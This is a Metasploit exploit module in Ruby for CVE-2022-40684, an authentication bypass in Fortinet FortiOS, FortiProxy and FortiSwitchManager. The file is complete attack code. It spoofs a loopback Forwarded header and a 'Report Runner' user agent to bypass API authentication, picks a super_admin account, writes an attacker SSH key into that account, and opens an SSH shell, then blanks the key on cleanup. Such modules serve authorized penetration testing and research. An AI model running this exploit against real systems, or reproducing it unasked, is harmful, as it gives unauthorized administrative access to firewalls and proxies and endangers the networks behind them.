##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SSH
  prepend Msf::Exploit::Remote::AutoCheck

  attr_accessor :ssh_socket

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',
        'Description' => %q{
          This module exploits an authentication bypass vulnerability
          in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API
          to gain access to a chosen account. And then add a SSH key to the
          authorized_keys file of the chosen account, allowing
          to login to the system with the chosen account.

          Successful exploitation results in remote code execution.
        },
        'Author' => [
          'Heyder Andrade <@HeyderAndrade>', # Metasploit module
          'Zach Hanley <@hacks_zach>', # PoC
        ],
        'References' => [
          ['CVE', '2022-40684'],
          ['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],
          ['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2022-10-10', # Vendor advisory
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Privileged' => true,
        'Targets' => [
          [
            'FortiOS',
            {
              'DefaultOptions' => {
                'PAYLOAD' => 'generic/ssh/interact'
              },
              'Payload' => {
                'Compat' => {
                  'PayloadType' => 'ssh_interact'
                }
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [
            IOC_IN_LOGS,
            ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file
          ]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),
        OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),
        OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),
        OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),
        OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),
        OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])
      ]
    )
  end

  def username
    if datastore['USERNAME']
      @username ||= datastore['USERNAME']
    else
      @username ||= detect_username
    end
  end

  def ssh_rport
    datastore['SSH_RPORT']
  end

  def current_keys
    @current_keys ||= read_keys
  end

  def ssh_keygen
    # ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`
    if datastore['PRIVATE_KEY']
      @ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(
        File.read(datastore['PRIVATE_KEY']),
        datastore['KEY_PASS'],
        datastore['PRIVATE_KEY']
      )
    else
      @ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')
    end
  end

  def ssh_private_key
    ssh_keygen.to_pem
  end

  def ssh_pubkey
    Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
  end

  def authorized_keys
    pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
    "#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost"
  end

  def fortinet_request(params = {})
    send_request_cgi(
      {
        'ctype' => 'application/json',
        'agent' => 'Report Runner',
        'headers' => {
          'Forwarded' => "for=\"[127.0.0.1]:#{rand(1024..65535)}\";by=\"[127.0.0.1]:#{rand(1024..65535)}\""
        }
      }.merge(params)
    )
  end

  def check
    vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
    # a normal request to the API should return a 401
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),
      'ctype' => 'application/json'
    })

    return CheckCode::Unknown('Target did not respond to check.') unless res
    return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401

    # Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable
    res = fortinet_request({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/system/status')
    })

    return CheckCode::Safe unless res&.code == 200

    version = res.get_json_document['version']

    print_good("Target is running the version #{version}, which is vulnerable.")

    Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\t give you access to the host.') unless sock }

    CheckCode::Vulnerable('And SSH is running which makes it exploitable.')
  end

  def cleanup
    return unless ssh_socket

    # it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method
    data = {
      "ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}" => '""'
    }

    fortinet_request({
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
      'data' => data.to_json
    })
  end

  def detect_username
    vprint_status('User auto-detection...')
    res = fortinet_request(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/system/admin')
    )
    users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact
    # we prefer to use admin, but if it doesn't exist we chose a random one.
    if datastore['PREFER_ADMIN']
      vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")
      users.include?('admin') ? 'admin' : users.sample
    else
      vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.")
      (users - ['admin']).sample
    end
  end

  def add_ssh_key
    if current_keys.include?(authorized_keys)
      # then we'll remove that on cleanup
      print_good('Your key is already in the authorized_keys file')
      return
    end
    vprint_status('Adding SSH key to authorized_keys file')
    # Adding the SSH key as the last entry in the authorized_keys file
    keystoadd = current_keys.first(2) + [authorized_keys]
    data = keystoadd.map.with_index { |key, idx| ["ssh-public-key#{idx + 1}", "\"#{key}\""] }.to_h

    res = fortinet_request({
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
      'data' => data.to_json
    })
    fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500
    body = res.get_json_document
    fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/
  end

  def read_keys
    vprint_status('Reading SSH key from authorized_keys file')
    res = fortinet_request({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/system/admin/', username)
    })
    fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200
    result = res.get_json_document['results'].first
    ['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|
      result[key].gsub('"', '') unless result[key].empty?
    end.compact
  end

  def do_login(ssh_options)
    # ensure we don't have a stale socket hanging around
    ssh_options[:proxy].proxies = nil if ssh_options[:proxy]
    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)
      end
    rescue Rex::ConnectionError
      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
    rescue Net::SSH::Disconnect, ::EOFError
      fail_with(Failure::Disconnected, 'Timed out during negotiation')
    rescue Net::SSH::AuthenticationFailed
      fail_with(Failure::NoAccess, 'Failed authentication')
    rescue Net::SSH::Exception => e
      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
    end

    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
  end

  def exploit
    print_status("Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}")
    add_ssh_key
    vprint_status('Establishing SSH connection')
    ssh_options = ssh_client_defaults.merge({
      auth_methods: ['publickey'],
      key_data: [ ssh_private_key ],
      port: ssh_rport
    })
    ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']

    do_login(ssh_options)

    handler(ssh_socket)
  end
end
